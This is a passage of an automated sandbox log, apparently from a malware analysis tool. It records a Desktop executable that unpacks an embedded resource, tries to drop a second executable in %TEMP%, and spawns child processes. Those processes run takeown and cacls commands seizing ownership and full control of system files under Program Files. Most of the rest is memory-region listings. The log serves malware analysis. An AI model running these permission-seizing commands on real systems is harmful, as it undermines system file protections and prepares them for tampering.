46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x26\xf4\x28\x7b\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0300.566] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0300.566] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0300.567] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0300.567] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0300.567] GetCurrentProcess () returned 0xffffffff [0300.567] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0300.567] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0300.567] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0300.567] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0300.567] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0300.567] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0300.567] LockResource (hResData=0x43c648) returned 0x43c648 [0300.568] GetCurrentPackageId () returned 0x3d54 [0300.568] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0300.881] GetLastError () returned 0x20 [0300.881] GetLastError () returned 0x20 [0300.881] SetLastError (dwErrCode=0x20) [0300.881] GetLastError () returned 0x20 [0300.881] SetLastError (dwErrCode=0x20) [0300.881] GetLastError () returned 0x20 [0300.881] SetLastError (dwErrCode=0x20) [0300.881] GetLastError () returned 0x20 [0300.881] SetLastError (dwErrCode=0x20) [0300.881] GetLastError () returned 0x20 [0300.881] SetLastError (dwErrCode=0x20) [0300.881] GetLastError () returned 0x20 [0300.881] SetLastError (dwErrCode=0x20) [0300.881] GetLastError () returned 0x20 [0300.881] SetLastError (dwErrCode=0x20) [0300.881] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e384 | out: lpMode=0x19e384) returned 1 [0300.978] WriteFile (in: hFile=0x3c, lpBuffer=0x19ea60*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e38c, lpOverlapped=0x0 | out: lpBuffer=0x19ea60*, lpNumberOfBytesWritten=0x19e38c*=0x49, lpOverlapped=0x0) returned 1 [0301.010] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0301.011] ExitProcess (uExitCode=0x1) Thread: id = 1025 os_tid = 0x6d8 Process: id = "158" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x6414f000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "137" os_parent_pid = "0xbe0" cmd_line = "cacls \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10763 start_va = 0x1f0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 10764 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10765 start_va = 0x220000 end_va = 0x233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 10766 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 10767 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 10768 start_va = 0x2c0000 end_va = 0x2c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 10769 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 10770 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 10771 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10772 start_va = 0x7e1b0000 end_va = 0x7e1d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e1b0000" filename = "" Region: id = 10773 start_va = 0x7e1d9000 end_va = 0x7e1d9fff entry_point = 0x0 region_type = private name = "private_0x000000007e1d9000" filename = "" Region: id = 10774 start_va = 0x7e1dc000 end_va = 0x7e1defff entry_point = 0x0 region_type = private name = "private_0x000000007e1dc000" filename = "" Region: id = 10775 start_va = 0x7e1df000 end_va = 0x7e1dffff entry_point = 0x0 region_type = private name = "private_0x000000007e1df000" filename = "" Region: id = 10776 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10777 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10778 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 10779 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10780 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10781 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 10782 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10808 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 10809 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10810 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10811 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10812 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10813 start_va = 0x350000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 10814 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10815 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10828 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 10829 start_va = 0x7e0b0000 end_va = 0x7e1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e0b0000" filename = "" Region: id = 10830 start_va = 0x490000 end_va = 0x54dfff entry_point = 0x490000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10831 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10832 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10833 start_va = 0x350000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 10834 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 10835 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10836 start_va = 0x7e1d6000 end_va = 0x7e1d8fff entry_point = 0x0 region_type = private name = "private_0x000000007e1d6000" filename = "" Region: id = 10837 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10838 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10839 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10840 start_va = 0x200000 end_va = 0x203fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10841 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10842 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10843 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 10844 start_va = 0x550000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 10845 start_va = 0x210000 end_va = 0x213fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 10846 start_va = 0x6f0000 end_va = 0xa26fff entry_point = 0x6f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10847 start_va = 0x330000 end_va = 0x331fff entry_point = 0x330000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 1027 os_tid = 0x148 Thread: id = 1029 os_tid = 0xec Process: id = "159" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x6ae54000" os_pid = "0xeec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "137" os_parent_pid = "0xbe0" cmd_line = "takeown /F \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10849 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 10850 start_va = 0xbf0000 end_va = 0x4beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 10851 start_va = 0x4bf0000 end_va = 0x4c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 10852 start_va = 0x4c10000 end_va = 0x4c11fff entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 10853 start_va = 0x4c20000 end_va = 0x4c33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c20000" filename = "" Region: id = 10854 start_va = 0x4c40000 end_va = 0x4c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 10855 start_va = 0x4c80000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 10856 start_va = 0x4cc0000 end_va = 0x4cc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 10857 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10858 start_va = 0x7ea30000 end_va = 0x7ea52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea30000" filename = "" Region: id = 10859 start_va = 0x7ea5a000 end_va = 0x7ea5afff entry_point = 0x0 region_type = private name = "private_0x000000007ea5a000" filename = "" Region: id = 10860 start_va = 0x7ea5c000 end_va = 0x7ea5efff entry_point = 0x0 region_type = private name = "private_0x000000007ea5c000" filename = "" Region: id = 10861 start_va = 0x7ea5f000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea5f000" filename = "" Region: id = 10862 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10863 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10864 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 10865 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10866 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10867 start_va = 0x4cd0000 end_va = 0x4cd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cd0000" filename = "" Region: id = 10868 start_va = 0x4ce0000 end_va = 0x4ce1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 10878 start_va = 0x4ea0000 end_va = 0x4eaffff entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 10879 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10880 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10881 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10882 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10883 start_va = 0x4cf0000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 10884 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10885 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10886 start_va = 0x4bf0000 end_va = 0x4bfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bf0000" filename = "" Region: id = 10887 start_va = 0x7e930000 end_va = 0x7ea2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e930000" filename = "" Region: id = 10888 start_va = 0x4eb0000 end_va = 0x4f6dfff entry_point = 0x4eb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10889 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10890 start_va = 0x4cf0000 end_va = 0x4d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 10891 start_va = 0x4d50000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 10892 start_va = 0x4e50000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e50000" filename = "" Region: id = 10893 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10894 start_va = 0x7ea57000 end_va = 0x7ea59fff entry_point = 0x0 region_type = private name = "private_0x000000007ea57000" filename = "" Region: id = 10895 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10896 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10897 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10898 start_va = 0x4c00000 end_va = 0x4c03fff entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 10899 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10900 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10901 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10902 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10903 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10904 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10905 start_va = 0x4f70000 end_va = 0x50cffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 10906 start_va = 0x4f70000 end_va = 0x4f99fff entry_point = 0x4f70000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10907 start_va = 0x50c0000 end_va = 0x50cffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 10908 start_va = 0x50d0000 end_va = 0x5257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050d0000" filename = "" Region: id = 10909 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10910 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10911 start_va = 0x5260000 end_va = 0x53e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005260000" filename = "" Region: id = 10912 start_va = 0x53f0000 end_va = 0x67effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000053f0000" filename = "" Region: id = 10913 start_va = 0x4c10000 end_va = 0x4c14fff entry_point = 0x4c10000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 10914 start_va = 0x4d30000 end_va = 0x4d30fff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 10915 start_va = 0x4d40000 end_va = 0x4d40fff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 10937 start_va = 0x67f0000 end_va = 0x6b26fff entry_point = 0x67f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10938 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10939 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 1030 os_tid = 0x3ac Thread: id = 1031 os_tid = 0x7ec Process: id = "160" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x5bbc9000" os_pid = "0xf14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "153" os_parent_pid = "0xcf0" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10917 start_va = 0x260000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 10918 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 10919 start_va = 0x290000 end_va = 0x2a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 10920 start_va = 0x2b0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 10921 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10922 start_va = 0x330000 end_va = 0x333fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 10923 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 10924 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 10925 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10926 start_va = 0x7f920000 end_va = 0x7f942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f920000" filename = "" 